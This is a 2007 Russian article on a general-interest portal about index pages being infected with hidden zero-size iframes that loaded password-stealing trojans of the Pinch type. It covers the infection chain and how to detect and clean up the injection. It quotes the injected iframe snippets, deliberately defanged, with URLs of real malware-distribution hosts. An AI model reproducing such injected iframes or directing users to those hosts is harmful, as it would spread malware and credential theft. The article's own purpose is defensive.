Главная сайта | Форум | Фотоальбом | Казуальные игры | Регистрация   | Вход | Cайт в избранное | Правила сайта и форума

Приветствую Вас Гость | RSS


Фильмы | Онлайн Видео | Софт | Новости и Статьи | Игры онлайн | Фотоальбом | Форум

ДЛЯ ПРОСМОТРА САЙТА РЕКОМЕНДУЕТСЯ ИСПОЛЬЗОВАТЬ:  Uran - браузер от uCoz на базе проекта Chromium. | Google ChromeOpera | Firefox 


МЕНЮ САЙТА

ПОИСК ПО САЙТУ

Gamesblender № 570: Duke Nukem Forever / Gotham Knights / Outriders / Star Citizen / The Division 2

Обзор Weird West

Gamesblender № 565: Unreal Engine 5 / Max Payne / Half-Life / Return to Monkey Island

Обзор Tiny Tina's Wonderlands

Обзор Ghostwire: Tokyo

Syberia: The World Before: Нет пути домой

Анчартед: На картах не значится

Лучшие игры 2021: Road 96

Halo Infinite: Возвращает 2001-й

Kena: Bridge of Spirits: Красиво порвёт жэпу

Игромания! Игровые новости, 4 апреля (Blizzard, Grand Theft Auto 6, Shadow of Mordor 2)

Игромания! Игровые новости, 4 июля (System Shock, Detroit, Тетрис, Overwatch)

Лучшие БОЕВИКИ 2016

Во что поиграть на этой неделе — 9 марта (Final Fantasy XV: Windows edition, Fear Effect Sedna)

Во что поиграть на этой неделе — 17 ноября (Star Wars: Battlefront 2, LEGO Marvel Super Heroes 2)

Игромания! Игровые новости, 6 марта (Middle-earth: Shadow of War, Ghost Recon Wildlands, Switch)

Игромания! Игровые новости, 22 февраля (DICE Awards, Роскомнадзор, Хидео Кодзима)

Во что поиграть на этой неделе — 28 сентября + Лучшие скидки на игры
СТАТИСТИКА
Всего материалов:
Фильмомания: 1813
Видео: 220
Каталог файлов: 91
Каталог статей: 6556
Фотоальбом: 1236
Форум: 838/6261
Каталог сайтов: 384

Всего зарегистрировано:
Зарегистрировано: 1505
Сегодня: 0
Вчера: 0
За неделю: 1
За месяц: 10

Из них:
Пользователи: 1436
Проверенные: 19
Друзья: 5
Редакторы: 0
Журналисты: 8
В вечном бане: 31
Модераторы: 1
Администраторы: 3

Из них:
Парней 1166
Девушек 337


ON-Line всего: 5
Гостей: 5
Пользователей: 0

Сейчас на сайте:


День Рождения у: shda84(38)
ПО ЖЕЛАНИЮ, ПОМОЧЬ САЙТУ, ВЫ МОЖЕТЕ ЧЕРЕЗ ПОЖЕРТВОВАНИЕ ЛЮБОЙ СУММЫ.




ВЫ МОЖЕТЕ ВОСПОЛЬЗОВАТЬСЯ

ДРУГИМ СПОСОБОМ ПОЖЕРТВОВАНИЙ
Категории каталога

Главная » Статьи » Статьи » Статьи: Общие

Новый троян, похищающий пароли доступа

Новый троян, похищающий пароли доступа и не определяющийся антивирусными программами.
Как бороться с прокатившейся эпидемией изменения
индексных страниц сайтов?
 

Я не зря написал слово "эпидемия". Дело в том, что в конце 2006 - начале 2007 года владельцы сайтов столкнулись с неприятной ситуацией. При открытии индексной страницы сайта (хостинг значение не имеет, платный или бесплатный) на компьютер начинал подгружаться вирус-троян, который антивирусной программой не определялся.
Оказывается, в код страницы были внесены изменения - после завершающего кода конца страницы была добавлена ссылка на сайт-вирусоноситель, с которого собственно и загружался троянец.
Некоторые индексные страницы вообще "стирались", то есть, на них не оставалось ни одного тега, чисто тебе чистый лист бумаги :).
Соответственно прокатилась волна претензий и обвинений к хостерам, из-за "взлома" хостов пользователей. Явление приняло такие масштабы, что впору было обвинять именно хостеров в том, что они допустили похищение баз аккаунтов пользователей и теперь злоумышленники их используют.
Один такой случай, правда, был в прошлом году с valuehost.ru, когда была "утянута" целая база паролей с сервера (за достоверность не ручаюсь), но в теперешней ситуации винить хостеров в заражении индексных страниц несколько преждевременно.

Говорю это на основании собственного опыта, так как я сам убедился, что в один прекрасный день были дефейснуты (хакнуты) индексные страницы этого сайта и бесплатников на narod.ru и nm.ru. Причем, вход на фтп был выполнен с моим аккаунтом и паролем, то есть без брутфорса и подобных вещей.
 Суть вносимых изменений заключается в том, что на странице index.html (или index.php) после завершающего тега '/html' появляется следующий участок кода:
iframe src=http://pynet.ws/col/index.php width="0" height="0" marginwidth="0" marginheight="0" scrolling="no" frameborder="0" и т.д.
Это может быть ссылка на http://www.counter-pr.info/sp_pack/counter/index.php, http://mz0i.info/gera/index.php или iframe src='http://ltds.biz/go.php?id=1781&user_name=sam' width=1 height=1 /iframe или другой сайт

Я намеренно убрал открывающие кавычки и гиперссылку, чтобы Вы не попались на эту ловушку :). Тег iframe, в который заключена ссылка, имеющий значение width="0" и height="0" говорит о том, что Вы не увидите открывающееся окно "левого" сайта, поскольку заданы нулевые координаты этого окна.
Сразу предвижу закономерный вопрос о лохизме и неиспользовании антивируса на компьютере :)) Так вот, антивирусом ДрВеб (DrWeb) лаборатории Данилова пользуюсь уже около 7 лет, претензий к нему не имел, обновляю постоянно. Плюс к этому на компьютере стоит Agnitum Outpost Firewall, который говорит свое веское слово в спорных случаях, типа "программа c:/windows/r.exe запрашивает исходящее соединение ..." и так далее. Таким способом, как я думал, мне удавалось иметь 100% уверенность в завтрашнем дне smile Оказалось, что все не так просто...

Анализ возможного заражения привел к парадоксальному результату. Индексные страницы менялись после того, как я проводил авторегистрацию сайтов в каталогах с помощью программы AllSubmitter. Сама программа, конечно, не виновата, просто в базе данных находились "зараженные" ссылки. Простая логика говорит о том, что в этой базе находится одна или несколько ссылок на сайты, с которых загружается вирус-троян.

Но проблема заключалась не только в паролях доступа к ftp. Кроме того была сделана попытка утянуть пароль на аську-семизначник, который удалось восстановить ретривом. Больше всего подходит под результаты ущерба Trojan типа Pinch, так как он умеет обходить файерволл и антивирусные программы, а "тырит" все, к чему может дотянуться, в том числе пароли, сохраненные в IE, CuteFTP (мой случай), Total Commander и еще десятке различных программ.
Исследование ссылки, которая дописывалась на индексную страницу моего сайта дали возможность предположить, что имеется в виду комплексная атака на компьютер. То есть:
Сначала загружается Trojan-Downloader.VBS. Psyme.fc - троянская программа-загрузчик других троянов. Именно она подгружает еще два вируса - Trojan-PSW.Win32.LdPinch.bik (или модификация) и Trojan.Win32.Agent.oh (не обязательно).

Самое интересное, что как ДрВеб, бывший на компьютере, так и впоследствии скачанный и установленный после него Антивирус KAV, определяли, что на компьютер закачивается троян и его ликвидировали. Вроде... На самом деле, это мог быть просто известный троян, который служил ширмой.
Еще один ньюанс: с самого начала загрузки файлов с зараженного сайта на рабочем столе мог создаваться и выполнялся файл new.exe (его копия могла создаваться в папке Temp и папке интернет-обозревателя - в моем случае Maxthon). В папке Виндовс появлялись файлы названиями r.exe или c.exe, которые антивирусом не опознавались как опасные.
По свидетельствам других пользователей в папке Windows мог создаваться поддельный файл с названием svchost.exe (оригинал находится в папке System32). Тогда в процессах операционной системы трудно определить, какой из процессов, используемых программой svchost.exe есть истинный, а какой поддельный.
Но! Существует одно "но" - трояны типа Pinch надежно отлавливаются как Доктор Веб, так и антивирусом Касперского. Вроде отлавливаются... Возможно предположение, что запущена или модификация этого вируса, которая успевает обойти антивирус, или работает другой вирус, который маскируется "Пинчем".
Как видим, прослеживается четкая тенденция - заражение индексной страницы, закачка на компьютер трояна-даунлоадера, закачка этим трояном одного или нескольких троянцев, которые похищают пароли, передача паролей злоумышленнику.

Такая передача может идти как через почтовый клиент (отправляется письмо на горячий мейл), так и через командную строку Internet Explorer (антивирусом не определяется). Вполне возможно, что троян мог использовать и имеющийся фтп-клиент для того, чтобы модифицировать индексную страницу. Вариантов здесь множество.
Одно замечание: в моем случае действие трояна можно было заметить по тому, что была запущена служба Telnet и удаленное управление рабочим столом, так же как и удаленный доступ к реестру. Можете проверить прямо сейчас, зайдите через "Панель управления/Администрирование" в список служб, и если они у Вас работают, отключите
Существовал еще один вариант, почему не определялся вирус, причем, достаточно вероятный. Используемая программа-троян могла принадлежать к руткитам (программам, внедряемым в ядро операционной системы), которые трудно обнаруживаются антивирусами. Или используется уязвимость Интернет Эксплорер версии 6 (Internet Explorer 6). Вот как о ней писалось: Удаленный пользователь может с помощью специально сформированной Web страницы загрузить на удаленную систему произвольный HTA файл и затем выполнить его с привилегиями пользователя, запустившего браузер. Удачная эксплуатация уязвимости позволит злоумышленнику выполнить произвольный код на целевой системе.
Спрашивается, что делать? Первое, проверьте свои сайты, если при открытии индексной страницы Ваш антивирус скажет, что выполняется или загружается троян, Вы заразились. Если даже и ничего не произойдет, просмотрите HTML-код, на предмет присутствия после тега '/html' внедренного тега 'iframe' с атрибутами "width="0" height="0" или width="1" height="1".
Если с Вами произошла эта неприятность, то как от нее избавиться читайте на странице:
Очистка операционной системы от вирусов, троянов и программ-шпионов

Так как поиск уязвимостей хакерами ориентирован на Internet Explorer, есть и компромиссный вариант: использовать альтернативный браузер, не базирующийся на платформе IE. Это Firefox (огненная лиса) на движке Mozilla. Ознакомиться с ним Вы можете по баннеру ниже:

Вы можете попробовать новый быстрый браузер Mozilla Firefox — это браузер, обладающий функцией блокировки всплывающих окон и просмотра страниц на вкладках, а также функциями безопасности и конфиденциальности. В браузер Firefox интегрирована панель инструментов Google, чтобы предоставить пользователям еще больше полезных функций: поиск в Google, проверку правописания и автозаполнение.
Установите и попробуйте - Вы не потеряете ничего. А вот если Mozilla Firefox оправдает Ваши ожидания, тогда забудете про все проблемы, связанные с осликом ИЕ.
Новую информацию об этой теме можете прочитать на странице

Если на странице вы заметили в посте отсутствие изображений, просьба сообщить , нажав на кнопку.



После прочтения материала " Новый троян, похищающий пароли доступа ", можно просмотреть форум и поискать темы по данной игре.



ДРУГИЕ МАТЕРИАЛЫ
Windows 7 покажут разработчикам в конце октября
Новый проект от студии Silicon Knights
Трехмерные мониторы от Zalman: окно в другой мир
Трейлер авиа-симулятора IL-2: Sturmovik: Birds of Prey
Планы на Луну
Samsung WiTu - репортаж с презентации
Как реанимировать IE7
Женское счастье: Cекс в семье
Самый тонкий в мире 22" монитор ASUS LS221H: кожа и стекло
Платформа AMD Tigris будет анонсирована в сентябре
Выход игры Dark Void откладывается до 2010 года
Доведи своего парня до безумия глубоким минетом!
У SPARKLE готовы восемь GeForce 9400 GT на 55-нм чипе
Супруга главы Intel полетит в космос
Nokia 8800 Carbon Arte: новые материалы, новая эстетика
На 2010 год запланирован запуск "солнечного паруса"
О борьбе со спамом: соперник живее всех живых
EVGA nForce 790i SLI FTW: платформа для победы!
Microsoft представила Zune HD
Нефть против биотоплива: война еще не проиграна?

Если вам понравился материал "Новый троян, похищающий пароли доступа", - поделитесь ним с другими.


html-cсылка на публикацию
BB-cсылка на публикацию
Прямая ссылка на публикацию


Категория: Статьи: Общие | Добавил: Фокусник (14.08.2007)
Просмотров: 3695

Ниже вы можете добавить комментарии к материалу " Новый троян, похищающий пароли доступа "

Внимание: Все ссылки и не относящиеся к теме комментарии будут удаляться. Для ссылок есть форум.


Всего комментариев : 0
avatar
ФОРМА ВХОДА
ПОЖЕРТВОВАНИЯ


WMZ: Z143317192317
WMR: R281809367609
WMP: P407353549505

https://goo.gl/eUn3pb
https://u.to/TN4iFg
ПАРТНЕРЫ

World of Warships — это free-to-play ММО-экшен, который позволяет окунуться в мир масштабных военно-морских баталий. Возьмите под управление легендарные боевые корабли первой половины ХХ века и завоюйте господство на бескрайних океанских просторах.

Курсы обмена WebMoney


Что такое ресурс Turbobit и как качать.

Установите Диск для Windows Папка Яндекс.Диска выглядит так же, как обычная папка на компьютере, но хранит ваши файлы ещё и на сервере Яндекса. Они доступны только вам и тем, кого вы сами выберете. А добраться до них можно с любого устройства с интернетом.
Получи 10 ГБ места бесплатно, на всю жизнь.
Видеообзор игры Destiny
Видеообзор игры Destiny
Воскресный вечер с Владимиром Соловьевым от 01.07.2018
Воскресный вечер с Владимиром Соловьевым от 01.07.2018
Gamesblender № 207: Silent Hills растворилась в тумане, а Valve убрала платные моды к Skyrim
Gamesblender № 207: Silent Hills растворилась в тумане, а Valve убрала платные моды к Skyrim
Игрозор №208
Игрозор №208
Топ-20 лучших трейлеров игр E3 2018
Топ-20 лучших трейлеров игр E3 2018
Warhammer: Vermintide 2: Видеообзор
Warhammer: Vermintide 2: Видеообзор
Семён Слепаков- Каждую пятницу я в говно
Семён Слепаков- Каждую пятницу я в говно
Metro Exodus - Подробности, СЮЖЕТ, ОРУЖИЕ, ЛОКАЦИИ, ГЕЙМПЛЕЙ (E3 2018)
Metro Exodus - Подробности, СЮЖЕТ, ОРУЖИЕ, ЛОКАЦИИ, ГЕЙМПЛЕЙ (E3 2018)
Видеообзор игры No Man's Sky
Видеообзор игры No Man's Sky
The Crew 2 - начало игры
The Crew 2 - начало игры

Когда российские дороги строят даже в Бельгии (20 фото)
Когда российские дороги строят даже в Бельгии (20 фото)
Прикольные снимки из аэропорта
Прикольные снимки из аэропорта
Горячий косплей (30 фото)
Горячий косплей (30 фото)
9-летняя австралийка пародирует знаменитостей, используя повседневные предметы (25 фото)
9-летняя австралийка пародирует знаменитостей, используя повседневные предметы (25 фото)
Редкие старые фотографии знаменитостей из коллекции Morrison Hotel Gallery (34 фото)
Редкие старые фотографии знаменитостей из коллекции Morrison Hotel Gallery (34 фото)
Как выглядит путешествие в «превосходном классе» поезда Glacier Express
Как выглядит путешествие в «превосходном классе» поезда Glacier Express
Героические животные, спасшие жизни людей
Героические животные, спасшие жизни людей
Художник изобразил диснеевских персонажей в виде реальных людей (17 фото)
Художник изобразил диснеевских персонажей в виде реальных людей (17 фото)
СТАТИСТИКА
Яндекс.Метрика


Copyright © 2000-2022, Alex LTD and System PervertedХостинг от uCoz